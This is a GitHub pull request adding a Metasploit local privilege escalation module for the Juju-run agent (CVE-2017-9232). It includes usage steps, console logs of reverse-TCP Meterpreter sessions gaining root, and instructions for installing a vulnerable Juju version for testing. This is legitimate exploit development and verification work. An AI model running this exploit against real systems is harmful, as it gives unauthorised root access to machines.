Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Juju-run Agent Privilege Escalation module (CVE-2017-9232) #9408

Merged
merged 4 commits into from Feb 11, 2018

Conversation

@bcoles
Copy link
Contributor

bcoles commented Jan 14, 2018

Add Juju-run Agent Privilege Escalation module (CVE-2017-9232).

    This module attempts to gain root privileges on Juju agent systems
    running the juju-run agent utility.

    Juju agent systems running agent tools prior to version 1.25.12,
    2.0.x before 2.0.4, and 2.1.x before 2.1.3, provide a UNIX domain socket
    to manage software ("units") without setting appropriate permissions,
    allowing unprivileged local users to execute arbitrary commands as root.

    This module has been tested successfully with Juju agent tools versions
    1.18.4, 1.25.5 and 1.25.9 on Ubuntu 14.04.1 LTS x86 deployed by Juju
    1.18.1-trusty-amd64 and 1.25.6-trusty-amd64 on Ubuntu 14.04.1 LTS x86_64.

Verification

  • Start msfconsole
  • Get a session
  • use exploit/linux/local/juju_run_agent_priv_esc
  • set SESSION <ID>
  • run
  • Verify you get a root session

Example Output

msf exploit(multi/handler) > use exploit/linux/local/juju_run_agent_priv_esc 
msf exploit(linux/local/juju_run_agent_priv_esc) > set session 1
session => 1
msf exploit(linux/local/juju_run_agent_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Trying 3 units...
[+] Unit "unit-zabbix-agent-1" uses a privileged socket
[*] Writing '/tmp/.tp9oGmPSvx' (207 bytes) ...
[*] Sending stage (857352 bytes) to 172.16.191.130
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.130:43760) at 2018-01-13 12:33:48 -0500
[+] Deleted /tmp/.tp9oGmPSvx

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.130
OS           : Ubuntu 14.04 (Linux 3.13.0-32-generic)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

Installation

The following installation instructions are for Ubuntu 14.04.1 LTS ("trusty").

# List avilable juju packages
apt-cache showpkg juju

# Select a vulnerale package
apt-get install juju-core=1.18.1-0ubuntu1

# Generate a config file:
juju init

# Edit the `manual` section of the newly generated config file,
# adding the appropriate `bootstrap-host` and `bootstrap-user`,
# ensuring you set the appropriate `default-series`
# (`trusty` for Ububtu 14.x)
#   bootstrap-host: juju-client.local
#   bootstrap-user: user
#   default-series: trusty

# Switch to the `manual` environment:
juju switch manual

# Bootstrap the remote host specified above
juju bootstrap

# Once the bootstrapping is complete, check if it was successful.
# You should see a machine with ID# 0
juju stat

# Deploy a unit to the machine with ID# 0:
juju deploy zabbix-agent --to 0

# Check if it worked.
# You should see a `zabbix-agent` unit running on machine with ID# 0
# It doesn't matter if the `zabbix-agent` installation failed,
# so long as the unit is present on the remote machine.
watch juju stat

# (Optional)
# To test various versions of the juju agent utilities,
# including juju-run, the juju tools can be updated remotely.
# Note: Downgrading is more difficult.

# You may or may not need to `set-env` the upstream tools URL
juju set-env agent-metadata-url=https://streams.canonical.com/juju/tools
juju set-env agent-stream=proposed

# Be careful to select a version which exists,
# otherwise bad things will happen.
juju upgrade-juju --version 1.25.2
bcoles added 2 commits Jan 16, 2018
@bcoles bcoles added docs and removed needs-docs labels Jan 18, 2018
@pbarry-r7 pbarry-r7 self-assigned this Jan 23, 2018
@pbarry-r7

This comment has been minimized.

Copy link
Contributor

pbarry-r7 commented Feb 10, 2018

Verified using two Ubuntu 14.04.1 x64 VMs with Juju 1.18.1-trusty-amd64:

msfconsole -q
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.0.2.48
lhost => 10.0.2.48
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.0.2.48:4444 
[*] Sending stage (857352 bytes) to 10.0.2.49
[*] Meterpreter session 1 opened (10.0.2.48:4444 -> 10.0.2.49:49303) at 2018-02-10 14:07:43 -0500

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/linux/local/juju_run_agent_priv_esc
msf exploit(linux/local/juju_run_agent_priv_esc) > show options

Module options (exploit/linux/local/juju_run_agent_priv_esc):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   SESSION      1                yes       The session to run this module on.
   UNIT                          no        A valid Juju unit name
   WritableDir  /tmp             yes       A directory where we can write files


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.48        yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf exploit(linux/local/juju_run_agent_priv_esc) > set lport 4445
lport => 4445
msf exploit(linux/local/juju_run_agent_priv_esc) > set session 1
session => 1
msf exploit(linux/local/juju_run_agent_priv_esc) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                           Connection
  --  ----  ----                   -----------                                           ----------
  1         meterpreter x86/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ 10.0.2.49  10.0.2.48:4444 -> 10.0.2.49:49314 (10.0.2.49)

msf exploit(linux/local/juju_run_agent_priv_esc) > check
[*]  The target service is running, but could not be validated.
msf exploit(linux/local/juju_run_agent_priv_esc) > run

[*] Started reverse TCP handler on 10.0.2.48:4445 
[*] Trying 3 units...
[+] Unit "unit-zabbix-agent-0" uses a privileged socket
[*] Writing '/tmp/.upKvqB' (207 bytes) ...
[*] Sending stage (857352 bytes) to 10.0.2.49
[*] Meterpreter session 2 opened (10.0.2.48:4445 -> 10.0.2.49:58115) at 2018-02-10 14:12:48 -0500
[+] Deleted /tmp/.upKvqB


meterpreter > 
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > 

Looks good, @bcoles! I had a couple very minor tweaks I'll push and, if those look OK to you, then I'll land. Cheers!

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 11, 2018

LGTM

@pbarry-r7 pbarry-r7 merged commit 4b6362a into rapid7:master Feb 11, 2018
1 check passed
1 check passed
continuous-integration/travis-ci/pr The Travis CI build passed
Details
pbarry-r7 added a commit that referenced this pull request Feb 11, 2018
…9232)
@pbarry-r7

This comment has been minimized.

Copy link
Contributor

pbarry-r7 commented Feb 11, 2018

Release Notes

The exploits/linux/local/juju_run_agent_priv_esc module has been added to the framework. It allows you to escalate privileges on Juju agent systems which have a vulnerable version of the juju-run utility.

@bcoles bcoles deleted the bcoles:juju_run_agent_priv_esc branch Feb 11, 2018
jmartin-r7 added a commit to jmartin-r7/metasploit-framework that referenced this pull request Feb 12, 2018
…-2017-9232)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

3 participants
You can’t perform that action at this time.